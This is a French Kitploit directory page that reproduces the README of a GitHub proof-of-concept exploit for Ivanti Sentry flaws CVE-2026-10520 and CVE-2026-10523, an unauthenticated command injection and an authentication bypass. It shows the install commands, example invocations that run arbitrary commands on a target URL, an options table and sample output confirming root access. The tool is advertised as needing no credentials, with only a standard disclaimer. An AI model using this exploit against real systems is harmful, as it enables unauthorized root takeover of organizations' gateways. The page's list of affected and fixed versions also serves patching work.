Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2026-10520
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Voir le dépôt
4il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

Image ChatGPT du 11 juin 2026, 11:19:12

Ivanti Sentry Critical RCE

Exécution de code à distance sans authentification + Contournement de l'authentification

Auteur : Ashraf Zaryouh "0xBlackash"

GitHub


📌 Aperçu

Deux vulnérabilités critiques affectant Ivanti Sentry (anciennement MobileIron Sentry) :

  • CVE-2026-10520 → CVSS 10.0 - Injection de commandes OS sans authentification (RCE en tant que root)
  • CVE-2026-10523 → CVSS 9.9 - Contournement de l'authentification

Ces failles permettent à des attaquants non authentifiés de compromettre entièrement le système.


✨ Fonctionnalités

  • ✅ PoC propre et rapide
  • ✅ Sans authentification (aucun identifiant requis)
  • ✅ Exécution de commandes en tant que root
  • ✅ Formatage détaillé de la sortie
  • ✅ Support proxy
  • ✅ Mode verbeux
  • ✅ Belle interface terminal

🚀 Utilisation

root@kitploit:~
python3 CVE-2026-10520.py --url <CIBLE> --cmd <COMMANDE>

Exemples

root@kitploit:~
# Utilisation de base
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# Mode verbeux
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# Avec proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# Vérifier le noyau
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 Options


🛠️ Installation

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 Exploitation réussie

Lorsque la cible est vulnérable, vous verrez :

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)

⚠️ Avertissement

Cet outil est destiné uniquement à des tests de sécurité éducatifs et autorisés.
L'utilisation non autorisée sur des systèmes dont vous n'êtes pas propriétaire est illégale.
L'auteur n'assume aucune responsabilité en cas d'utilisation abusive.


🔧 Versions affectées

  • Ivanti Sentry avant 10.5.2, 10.6.2, 10.7.1

Corrigé dans : 10.5.2 / 10.6.2 / 10.7.1


📜 Références

  • Avis officiel d'Ivanti
  • Recherche originale de watchTowr Labs
  • Entrées NVD : CVE-2026-10520, CVE-2026-10523

Fait avec ❤️ par Ashraf Zaryouh "0xBlackash"

Mettez une étoile au dépôt si vous l'avez trouvé utile ! ⭐

Télécharger l’outil
ArgumentDescriptionRequis
--urlURL cible (ex. https://cible:8443)Oui
--cmdCommande à exécuterOui
-v, --verboseActiver le mode verbeuxNon
--proxyProxy HTTP (hôte:port)Non